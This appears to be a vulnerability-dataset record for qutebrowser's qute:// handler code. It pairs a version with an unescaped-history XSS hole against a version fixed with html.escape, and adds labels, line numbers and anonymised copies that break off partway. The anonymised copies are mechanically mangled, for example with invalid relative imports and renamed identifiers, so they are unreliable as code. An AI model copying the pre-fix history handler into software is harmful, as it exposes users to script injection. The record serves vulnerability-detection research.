distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy backend warning")
return 'text/html', html
def _qute_settings_set(url):
"""Handler for qute://settings/set."""
query = QUrlQuery(url)
option = query.queryItemValue('option', QUrl.FullyDecoded)
value = query.queryItemValue('value', QUrl.FullyDecoded)
# https://github.com/qutebrowser/qutebrowser/issues/727
if option == 'content.javascript.enabled' and value == 'false':
msg = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(msg)
return 'text/html', b'error: ' + msg.encode('utf-8')
try:
config.instance.set_str(option, value, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@add_handler('settings')
def qute_settings(url):
"""Handler for qute://settings. View/change qute configuration."""
if url.path() == '/set':
return _qute_settings_set(url)
html = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', html
@add_handler('bindings')
def qute_bindings(_url):
"""Handler for qute://bindings. View keybindings."""
bindings = {}
defaults = config.val.bindings.default
modes = set(defaults.keys()).union(config.val.bindings.commands)
modes.remove('normal')
modes = ['normal'] + sorted(list(modes))
for mode in modes:
bindings[mode] = config.key_instance.get_bindings_for(mode)
html = jinja.render('bindings.html', title='Bindings',
bindings=bindings)
return 'text/html', html
@add_handler('back')
def qute_back(url):
"""Handler for qute://back.
Simple page to free ram / lazy load a site, goes back on focusing the tab.
"""
html = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(url.fragment()))
return 'text/html', html
@add_handler('configdiff')
def qute_configdiff(url):
"""Handler for qute://configdiff."""
if url.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
error = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', error
else:
data = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', data
@add_handler('pastebin-version')
def qute_pastebin_version(_url):
"""Handler that pastebins the version string."""
version.pastebin_version()
return 'text/plain', b'Paste called.'
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Backend-independent qute://* code.
Module attributes:
pyeval_output: The output of the last :pyeval command.
_HANDLERS: The handlers registered via decorators.
"""
import html
import json
import os
import time
import textwrap
import mimetypes
import urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
pyeval_output = ":pyeval was never called"
spawn_output = ":spawn was never called"
_HANDLERS = {}
class NoHandlerFound(Exception):
"""Raised when no handler was found for the given URL."""
pass
class QuteSchemeOSError(Exception):
"""Called when there was an OSError inside a handler."""
pass
class QuteSchemeError(Exception):
"""Exception to signal that a handler should return an ErrorReply.
Attributes correspond to the arguments in
networkreply.ErrorNetworkReply.
Attributes:
errorstring: Error string to print.
error: Numerical error value.
"""
def __init__(self, errorstring, error):
self.errorstring = errorstring
self.error = error
super().__init__(errorstring)
class Redirect(Exception):
"""Exception to signal a redirect should happen.
Attributes:
url: The URL to redirect to, as a QUrl.
"""
def __init__(self, url):
super().__init__(url.toDisplayString())
self.url = url
class add_handler: # noqa: N801,N806 pylint: disable=invalid-name
"""Decorator to register a qute://* URL handler.
Attributes:
_name: The 'foo' part of qute://foo
backend: Limit which backends the handler can run with.
"""
def __init__(self, name, backend=None):
self._name = name
self._backend = backend
self._function = None
def __call__(self, function):
self._function = function
_HANDLERS[self._name] = self.wrapper
return function
def wrapper(self, *args, **kwargs):
"""Call the underlying function."""
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*args, **kwargs)
else:
return self._function(*args, **kwargs)
def wrong_backend_handler(self, url):
"""Show an error page about using the invalid backend."""
html = jinja.render('error.html',
title="Error while opening qute://url",
url=url.toDisplayString(),
error='{} is not available with this '
'backend'.format(url.toDisplayString()))
return 'text/html', html
def data_for_url(url):
"""Get the data to show for the given URL.
Args:
url: The QUrl to show.
Return:
A (mimetype, data) tuple.
"""
norm_url = url.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if norm_url != url:
raise Redirect(norm_url)
path = url.path()
host = url.host()
query = urlutils.query_string(url)
# A url like "qute:foo" is split as "scheme:path", not "scheme:host".
log.misc.debug("url: {}, path: {}, host {}".format(
url.toDisplayString(), path, host))
if not path or not host:
new_url = QUrl()
new_url.setScheme('qute')
# When path is absent, e.g. qute://help (with no trailing slash)
if host:
new_url.setHost(host)
# When host is absent, e.g. qute:help
else:
new_url.setHost(path)
new_url.setPath('/')
if query:
new_url.setQuery(query)
if new_url.host(): # path was a valid host
raise Redirect(new_url)
try:
handler = _HANDLERS[host]
except KeyError:
raise NoHandlerFound(url)
try:
mimetype, data = handler(url)
except OSError as e:
# FIXME:qtwebengine how to handle this?
raise QuteSchemeOSError(e)
except QuteSchemeError:
raise
assert mimetype is not None, url
if mimetype == 'text/html' and isinstance(data, str):
# We let handlers return HTML as text
data = data.encode('utf-8', errors='xmlcharrefreplace')
return mimetype, data
@add_handler('bookmarks')
def qute_bookmarks(_url):
"""Handler for qute://bookmarks. Display all quickmarks / bookmarks."""
bookmarks = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
quickmarks = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by name
html = jinja.render('bookmarks.html',
title='Bookmarks',
bookmarks=bookmarks,
quickmarks=quickmarks)
return 'text/html', html
@add_handler('tabs')
def qute_tabs(_url):
"""Handler for qute://tabs. Display information about all open tabs."""
tabs = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
tabbed_browser = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in tabbed_browser.widgets():
if tab.url() not in [QUrl("qute://tabs/"), QUrl("qute://tabs")]:
urlstr = tab.url().toDisplayString()
tabs[str(win_id)].append((tab.title(), urlstr))
html = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=tabs)
return 'text/html', html
def history_data(start_time, offset=None):
"""Return history data.
Arguments:
start_time: select history starting from this timestamp.
offset: number of items to skip
"""
# history atimes are stored as ints, ensure start_time is not a float
start_time = int(start_time)
hist = objreg.get('web-history')
if offset is not None:
entries = hist.entries_before(start_time, limit=1000, offset=offset)
else:
# end is 24hrs earlier than start
end_time = start_time - 24*60*60
entries = hist.entries_between(end_time, start_time)
return [{"url": html.escape(e.url),
"title": html.escape(e.title) or html.escape(e.url),
"time": e.atime} for e in entries]
@add_handler('history')
def qute_history(url):
"""Handler for qute://history. Display and serve history."""
if url.path() == '/data':
try:
offset = QUrlQuery(url).queryItemValue("offset")
offset = int(offset) if offset else None
except ValueError as e:
raise QuteSchemeError("Query parameter offset is invalid", e)
# Use start_time in query or current time.
try:
start_time = QUrlQuery(url).queryItemValue("start_time")
start_time = float(start_time) if start_time else time.time()
except ValueError as e:
raise QuteSchemeError("Query parameter start_time is invalid", e)
return 'text/html', json.dumps(history_data(start_time, offset))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@add_handler('javascript')
def qute_javascript(url):
"""Handler for qute://javascript.
Return content of file given as query parameter.
"""
path = url.path()
if path:
path = "javascript" + os.sep.join(path.split('/'))
return 'text/html', utils.read_file(path, binary=False)
else:
raise QuteSchemeError("No file specified", ValueError())
@add_handler('pyeval')
def qute_pyeval(_url):
"""Handler for qute://pyeval."""
html = jinja.render('pre.html', title='pyeval', content=pyeval_output)
return 'text/html', html
@add_handler('spawn-output')
def qute_spawn_output(_url):
"""Handler for qute://spawn-output."""
html = jinja.render('pre.html', title='spawn output', content=spawn_output)
return 'text/html', html
@add_handler('version')
@add_handler('verizon')
def qute_version(_url):
"""Handler for qute://version."""
html = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', html
@add_handler('plainlog')
def qute_plainlog(url):
"""Handler for qute://plainlog.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
text = "Log output was disabled."
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
text = log.ram_handler.dump_log(html=False, level=level)
html = jinja.render('pre.html', title='log', content=text)
return 'text/html', html
@add_handler('log')
def qute_log(url):
"""Handler for qute://log.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
html_log = None
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
html_log = log.ram_handler.dump_log(html=True, level=level)
html = jinja.render('log.html', title='log', content=html_log)
return 'text/html', html
@add_handler('gpl')
def qute_gpl(_url):
"""Handler for qute://gpl. Return HTML content as string."""
return 'text/html', utils.read_file('html/license.html')
@add_handler('help')
def qute_help(url):
"""Handler for qute://help."""
urlpath = url.path()
if not urlpath or urlpath == '/':
urlpath = 'index.html'
else:
urlpath = urlpath.lstrip('/')
if not docutils.docs_up_to_date(urlpath):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
path = 'html/doc/{}'.format(urlpath)
if not urlpath.endswith('.html'):
try:
bdata = utils.read_file(path, binary=True)
except OSError as e:
raise QuteSchemeOSError(e)
mimetype, _encoding = mimetypes.guess_type(urlpath)
assert mimetype is not None, url
return mimetype, bdata
try:
data = utils.read_file(path)
except OSError:
# No .html around, let's see if we find the asciidoc
asciidoc_path = path.replace('.html', '.asciidoc')
if asciidoc_path.startswith('html/doc/'):
asciidoc_path = asciidoc_path.replace('html/doc/', '../doc/help/')
try:
asciidoc = utils.read_file(asciidoc_path)
except OSError:
asciidoc = None
if asciidoc is None:
raise
preamble = textwrap.dedent("""
There was an error loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (preamble + asciidoc).encode('utf-8')
else:
return 'text/html', data
@add_handler('backend-warning')
def qute_backend_warning(_url):
"""Handler for qute://backend-warning."""
html = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy backend warning")
return 'text/html', html
def _qute_settings_set(url):
"""Handler for qute://settings/set."""
query = QUrlQuery(url)
option = query.queryItemValue('option', QUrl.FullyDecoded)
value = query.queryItemValue('value', QUrl.FullyDecoded)
# https://github.com/qutebrowser/qutebrowser/issues/727
if option == 'content.javascript.enabled' and value == 'false':
msg = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(msg)
return 'text/html', b'error: ' + msg.encode('utf-8')
try:
config.instance.set_str(option, value, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@add_handler('settings')
def qute_settings(url):
"""Handler for qute://settings. View/change qute configuration."""
if url.path() == '/set':
return _qute_settings_set(url)
html = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', html
@add_handler('bindings')
def qute_bindings(_url):
"""Handler for qute://bindings. View keybindings."""
bindings = {}
defaults = config.val.bindings.default
modes = set(defaults.keys()).union(config.val.bindings.commands)
modes.remove('normal')
modes = ['normal'] + sorted(list(modes))
for mode in modes:
bindings[mode] = config.key_instance.get_bindings_for(mode)
html = jinja.render('bindings.html', title='Bindings',
bindings=bindings)
return 'text/html', html
@add_handler('back')
def qute_back(url):
"""Handler for qute://back.
Simple page to free ram / lazy load a site, goes back on focusing the tab.
"""
html = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(url.fragment()))
return 'text/html', html
@add_handler('configdiff')
def qute_configdiff(url):
"""Handler for qute://configdiff."""
if url.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
error = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', error
else:
data = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', data
@add_handler('pastebin-version')
def qute_pastebin_version(_url):
"""Handler that pastebins the version string."""
version.pastebin_version()
return 'text/plain', b'Paste called.'
| xss | {
"code": [
" return [{\"url\": e.url, \"title\": e.title or e.url, \"time\": e.atime}",
" for e in entries]"
],
"line_no": [
244,
245
]
} | {
"code": [
"import html",
" return [{\"url\": html.escape(e.url),",
" \"time\": e.atime} for e in entries]"
],
"line_no": [
27,
245,
247
]
} |
import json
import os
import time
import .textwrap
import .mimetypes
import .urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
VAR_0 = ":pyeval was never called"
VAR_1 = ":spawn was never called"
VAR_2 = {}
class CLASS_0(Exception):
pass
class CLASS_1(Exception):
pass
class CLASS_2(Exception):
def __init__(self, VAR_7, VAR_8):
self.errorstring = VAR_7
self.error = VAR_8
super().__init__(VAR_7)
class CLASS_3(Exception):
def __init__(self, VAR_3):
super().__init__(VAR_3.toDisplayString())
self.url = VAR_3
class CLASS_4: # noqa: N801,N806 pylint: disable=invalid-VAR_9
def __init__(self, VAR_9, VAR_10=None):
self._name = VAR_9
self._backend = VAR_10
self._function = None
def __call__(self, VAR_11):
self._function = VAR_11
VAR_2[self._name] = self.wrapper
return VAR_11
def FUNC_20(self, *VAR_12, **VAR_13):
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*VAR_12, **VAR_13)
else:
return self._function(*VAR_12, **VAR_13)
def FUNC_21(self, VAR_3):
VAR_20 = jinja.render('error.html',
title="Error while opening qute://url",
VAR_3=url.toDisplayString(),
VAR_8='{} is not available with this '
'backend'.format(VAR_3.toDisplayString()))
return 'text/html', VAR_20
def FUNC_0(VAR_3):
VAR_14 = VAR_3.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if VAR_14 != VAR_3:
raise CLASS_3(VAR_14)
VAR_15 = VAR_3.path()
VAR_16 = VAR_3.host()
VAR_17 = urlutils.query_string(VAR_3)
log.misc.debug("url: {}, VAR_15: {}, VAR_16 {}".format(
VAR_3.toDisplayString(), VAR_15, VAR_16))
if not VAR_15 or not VAR_16:
VAR_29 = QUrl()
VAR_29.setScheme('qute')
if VAR_16:
VAR_29.setHost(VAR_16)
else:
VAR_29.setHost(VAR_15)
VAR_29.setPath('/')
if VAR_17:
VAR_29.setQuery(VAR_17)
if VAR_29.host(): # VAR_15 was a valid VAR_16
raise CLASS_3(VAR_29)
try:
VAR_30 = VAR_2[VAR_16]
except KeyError:
raise CLASS_0(VAR_3)
try:
VAR_31, VAR_32 = VAR_30(VAR_3)
except OSError as e:
raise CLASS_1(e)
except CLASS_2:
raise
assert VAR_31 is not None, VAR_3
if VAR_31 == 'text/html' and isinstance(VAR_32, str):
VAR_32 = data.encode('utf-8', errors='xmlcharrefreplace')
return VAR_31, VAR_32
@CLASS_4('bookmarks')
def FUNC_1(VAR_4):
VAR_18 = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
VAR_19 = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by VAR_9
VAR_20 = jinja.render('bookmarks.html',
title='Bookmarks',
VAR_18=bookmarks,
VAR_19=quickmarks)
return 'text/html', VAR_20
@CLASS_4('tabs')
def FUNC_2(VAR_4):
VAR_21 = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
VAR_33 = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in VAR_33.widgets():
if tab.url() not in [QUrl("qute://VAR_21/"), QUrl("qute://tabs")]:
VAR_45 = tab.url().toDisplayString()
VAR_21[str(win_id)].append((tab.title(), VAR_45))
VAR_20 = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=VAR_21)
return 'text/html', VAR_20
def FUNC_3(VAR_5, VAR_6=None):
VAR_5 = int(VAR_5)
VAR_22 = objreg.get('web-history')
if VAR_6 is not None:
VAR_34 = VAR_22.entries_before(VAR_5, limit=1000, VAR_6=offset)
else:
VAR_35 = VAR_5 - 24*60*60
VAR_34 = VAR_22.entries_between(VAR_35, VAR_5)
return [{"url": e.url, "title": e.title or e.url, "time": e.atime}
for e in VAR_34]
@CLASS_4('history')
def FUNC_4(VAR_3):
if VAR_3.path() == '/data':
try:
VAR_6 = QUrlQuery(VAR_3).queryItemValue("offset")
VAR_6 = int(VAR_6) if VAR_6 else None
except ValueError as e:
raise CLASS_2("Query parameter VAR_6 is invalid", e)
try:
VAR_5 = QUrlQuery(VAR_3).queryItemValue("start_time")
VAR_5 = float(VAR_5) if VAR_5 else time.time()
except ValueError as e:
raise CLASS_2("Query parameter VAR_5 is invalid", e)
return 'text/html', json.dumps(FUNC_3(VAR_5, VAR_6))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@CLASS_4('javascript')
def FUNC_5(VAR_3):
VAR_15 = VAR_3.path()
if VAR_15:
VAR_15 = "javascript" + os.sep.join(VAR_15.split('/'))
return 'text/html', utils.read_file(VAR_15, binary=False)
else:
raise CLASS_2("No file specified", ValueError())
@CLASS_4('pyeval')
def FUNC_6(VAR_4):
VAR_20 = jinja.render('pre.html', title='pyeval', content=VAR_0)
return 'text/html', VAR_20
@CLASS_4('spawn-output')
def FUNC_7(VAR_4):
VAR_20 = jinja.render('pre.html', title='spawn output', content=VAR_1)
return 'text/html', VAR_20
@CLASS_4('version')
@CLASS_4('verizon')
def FUNC_8(VAR_4):
VAR_20 = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', VAR_20
@CLASS_4('plainlog')
def FUNC_9(VAR_3):
if log.ram_handler is None:
VAR_36 = "Log output was disabled."
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_36 = log.ram_handler.dump_log(VAR_20=False, VAR_37=level)
VAR_20 = jinja.render('pre.html', title='log', content=VAR_36)
return 'text/html', VAR_20
@CLASS_4('log')
def FUNC_10(VAR_3):
if log.ram_handler is None:
VAR_38 = None
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_38 = log.ram_handler.dump_log(VAR_20=True, VAR_37=level)
VAR_20 = jinja.render('log.html', title='log', content=VAR_38)
return 'text/html', VAR_20
@CLASS_4('gpl')
def FUNC_11(VAR_4):
return 'text/html', utils.read_file('html/license.html')
@CLASS_4('help')
def FUNC_12(VAR_3):
VAR_23 = VAR_3.path()
if not VAR_23 or VAR_23 == '/':
VAR_23 = 'index.html'
else:
VAR_23 = VAR_23.lstrip('/')
if not docutils.docs_up_to_date(VAR_23):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
VAR_15 = 'html/doc/{}'.format(VAR_23)
if not VAR_23.endswith('.html'):
try:
VAR_42 = utils.read_file(VAR_15, binary=True)
except OSError as e:
raise CLASS_1(e)
VAR_31, VAR_39 = mimetypes.guess_type(VAR_23)
assert VAR_31 is not None, VAR_3
return VAR_31, VAR_42
try:
VAR_32 = utils.read_file(VAR_15)
except OSError:
VAR_43 = VAR_15.replace('.html', '.asciidoc')
if VAR_43.startswith('html/doc/'):
VAR_43 = VAR_43.replace('html/doc/', '../doc/help/')
try:
VAR_46 = utils.read_file(VAR_43)
except OSError:
VAR_46 = None
if VAR_46 is None:
raise
VAR_44 = textwrap.dedent("""
There was an VAR_8 loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (VAR_44 + VAR_46).encode('utf-8')
else:
return 'text/html', VAR_32
@CLASS_4('backend-warning')
def FUNC_13(VAR_4):
VAR_20 = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy VAR_10 warning")
return 'text/html', VAR_20
def FUNC_14(VAR_3):
VAR_17 = QUrlQuery(VAR_3)
VAR_24 = VAR_17.queryItemValue('option', QUrl.FullyDecoded)
VAR_25 = VAR_17.queryItemValue('value', QUrl.FullyDecoded)
if VAR_24 == 'content.javascript.enabled' and VAR_25 == 'false':
VAR_40 = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(VAR_40)
return 'text/html', b'error: ' + VAR_40.encode('utf-8')
try:
config.instance.set_str(VAR_24, VAR_25, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@CLASS_4('settings')
def FUNC_15(VAR_3):
if VAR_3.path() == '/set':
return FUNC_14(VAR_3)
VAR_20 = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', VAR_20
@CLASS_4('bindings')
def FUNC_16(VAR_4):
VAR_26 = {}
VAR_27 = config.val.bindings.default
VAR_28 = set(VAR_27.keys()).union(config.val.bindings.commands)
VAR_28.remove('normal')
VAR_28 = ['normal'] + sorted(list(VAR_28))
for VAR_41 in VAR_28:
VAR_26[VAR_41] = config.key_instance.get_bindings_for(VAR_41)
VAR_20 = jinja.render('bindings.html', title='Bindings',
VAR_26=bindings)
return 'text/html', VAR_20
@CLASS_4('back')
def FUNC_17(VAR_3):
VAR_20 = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(VAR_3.fragment()))
return 'text/html', VAR_20
@CLASS_4('configdiff')
def FUNC_18(VAR_3):
if VAR_3.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
VAR_8 = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', VAR_8
else:
VAR_32 = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', VAR_32
@CLASS_4('pastebin-version')
def FUNC_19(VAR_4):
version.pastebin_version()
return 'text/plain', b'Paste called.'
|
import .html
import json
import os
import time
import .textwrap
import .mimetypes
import .urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
VAR_0 = ":pyeval was never called"
VAR_1 = ":spawn was never called"
VAR_2 = {}
class CLASS_0(Exception):
pass
class CLASS_1(Exception):
pass
class CLASS_2(Exception):
def __init__(self, VAR_7, VAR_8):
self.errorstring = VAR_7
self.error = VAR_8
super().__init__(VAR_7)
class CLASS_3(Exception):
def __init__(self, VAR_3):
super().__init__(VAR_3.toDisplayString())
self.url = VAR_3
class CLASS_4: # noqa: N801,N806 pylint: disable=invalid-VAR_9
def __init__(self, VAR_9, VAR_10=None):
self._name = VAR_9
self._backend = VAR_10
self._function = None
def __call__(self, VAR_11):
self._function = VAR_11
VAR_2[self._name] = self.wrapper
return VAR_11
def FUNC_20(self, *VAR_12, **VAR_13):
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*VAR_12, **VAR_13)
else:
return self._function(*VAR_12, **VAR_13)
def FUNC_21(self, VAR_3):
VAR_20 = jinja.render('error.html',
title="Error while opening qute://url",
VAR_3=url.toDisplayString(),
VAR_8='{} is not available with this '
'backend'.format(VAR_3.toDisplayString()))
return 'text/html', VAR_20
def FUNC_0(VAR_3):
VAR_14 = VAR_3.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if VAR_14 != VAR_3:
raise CLASS_3(VAR_14)
VAR_15 = VAR_3.path()
VAR_16 = VAR_3.host()
VAR_17 = urlutils.query_string(VAR_3)
log.misc.debug("url: {}, VAR_15: {}, VAR_16 {}".format(
VAR_3.toDisplayString(), VAR_15, VAR_16))
if not VAR_15 or not VAR_16:
VAR_29 = QUrl()
VAR_29.setScheme('qute')
if VAR_16:
VAR_29.setHost(VAR_16)
else:
VAR_29.setHost(VAR_15)
VAR_29.setPath('/')
if VAR_17:
VAR_29.setQuery(VAR_17)
if VAR_29.host(): # VAR_15 was a valid VAR_16
raise CLASS_3(VAR_29)
try:
VAR_30 = VAR_2[VAR_16]
except KeyError:
raise CLASS_0(VAR_3)
try:
VAR_31, VAR_32 = VAR_30(VAR_3)
except OSError as e:
raise CLASS_1(e)
except CLASS_2:
raise
assert VAR_31 is not None, VAR_3
if VAR_31 == 'text/html' and isinstance(VAR_32, str):
VAR_32 = data.encode('utf-8', errors='xmlcharrefreplace')
return VAR_31, VAR_32
@CLASS_4('bookmarks')
def FUNC_1(VAR_4):
VAR_18 = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
VAR_19 = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by VAR_9
VAR_20 = jinja.render('bookmarks.html',
title='Bookmarks',
VAR_18=bookmarks,
VAR_19=quickmarks)
return 'text/html', VAR_20
@CLASS_4('tabs')
def FUNC_2(VAR_4):
VAR_21 = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
VAR_33 = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in VAR_33.widgets():
if tab.url() not in [QUrl("qute://VAR_21/"), QUrl("qute://tabs")]:
VAR_45 = tab.url().toDisplayString()
VAR_21[str(win_id)].append((tab.title(), VAR_45))
VAR_20 = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=VAR_21)
return 'text/html', VAR_20
def FUNC_3(VAR_5, VAR_6=None):
VAR_5 = int(VAR_5)
VAR_22 = objreg.get('web-history')
if VAR_6 is not None:
VAR_34 = VAR_22.entries_before(VAR_5, limit=1000, VAR_6=offset)
else:
VAR_35 = VAR_5 - 24*60*60
VAR_34 = VAR_22.entries_between(VAR_35, VAR_5)
return [{"url": VAR_20.escape(e.url),
"title": VAR_20.escape(e.title) or VAR_20.escape(e.url),
"time": e.atime} for e in VAR_34]
@CLASS_4('history')
def FUNC_4(VAR_3):
if VAR_3.path() == '/data':
try:
VAR_6 = QUrlQuery(VAR_3).queryItemValue("offset")
VAR_6 = int(VAR_6) if VAR_6 else None
except ValueError as e:
raise CLASS_2("Query parameter VAR_6 is invalid", e)
try:
VAR_5 = QUrlQuery(VAR_3).queryItemValue("start_time")
VAR_5 = float(VAR_5) if VAR_5 else time.time()
except ValueError as e:
raise CLASS_2("Query parameter VAR_5 is invalid", e)
return 'text/html', json.dumps(FUNC_3(VAR_5, VAR_6))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@CLASS_4('javascript')
def FUNC_5(VAR_3):
VAR_15 = VAR_3.path()
if VAR_15:
VAR_15 = "javascript" + os.sep.join(VAR_15.split('/'))
return 'text/html', utils.read_file(VAR_15, binary=False)
else:
raise CLASS_2("No file specified", ValueError())
@CLASS_4('pyeval')
def FUNC_6(VAR_4):
VAR_20 = jinja.render('pre.html', title='pyeval', content=VAR_0)
return 'text/html', VAR_20
@CLASS_4('spawn-output')
def FUNC_7(VAR_4):
VAR_20 = jinja.render('pre.html', title='spawn output', content=VAR_1)
return 'text/html', VAR_20
@CLASS_4('version')
@CLASS_4('verizon')
def FUNC_8(VAR_4):
VAR_20 = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', VAR_20
@CLASS_4('plainlog')
def FUNC_9(VAR_3):
if log.ram_handler is None:
VAR_36 = "Log output was disabled."
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_36 = log.ram_handler.dump_log(VAR_20=False, VAR_37=level)
VAR_20 = jinja.render('pre.html', title='log', content=VAR_36)
return 'text/html', VAR_20
@CLASS_4('log')
def FUNC_10(VAR_3):
if log.ram_handler is None:
VAR_38 = None
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_38 = log.ram_handler.dump_log(VAR_20=True, VAR_37=level)
VAR_20 = jinja.render('log.html', title='log', content=VAR_38)
return 'text/html', VAR_20
@CLASS_4('gpl')
def FUNC_11(VAR_4):
return 'text/html', utils.read_file('html/license.html')
@CLASS_4('help')
def FUNC_12(VAR_3):
VAR_23 = VAR_3.path()
if not VAR_23 or VAR_23 == '/':
VAR_23 = 'index.html'
else:
VAR_23 = VAR_23.lstrip('/')
if not docutils.docs_up_to_date(VAR_23):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
VAR_15 = 'html/doc/{}'.format(VAR_23)
if not VAR_23.endswith('.html'):
try:
VAR_42 = utils.read_file(VAR_15, binary=True)
except OSError as e:
raise CLASS_1(e)
